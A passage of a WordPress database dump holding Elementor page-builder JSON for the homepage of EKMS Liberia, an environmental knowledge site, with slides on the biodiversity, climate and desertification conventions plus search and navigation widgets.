top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.237},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.08},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.347},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(27044,3935,'_elementor_version','3.4.0'),(27045,3935,'_elementor_template_type','wp-page'),(27046,3935,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(38611,5782,'_wp_attached_file','2026/02/EKMS-LIB.jpg'),(27048,3935,'_elementor_pro_version','3.3.6'),(27052,3936,'_wp_page_template','default'),(27053,3936,'_elementor_edit_mode','builder'),(27054,3936,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.237},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.08},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.347},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\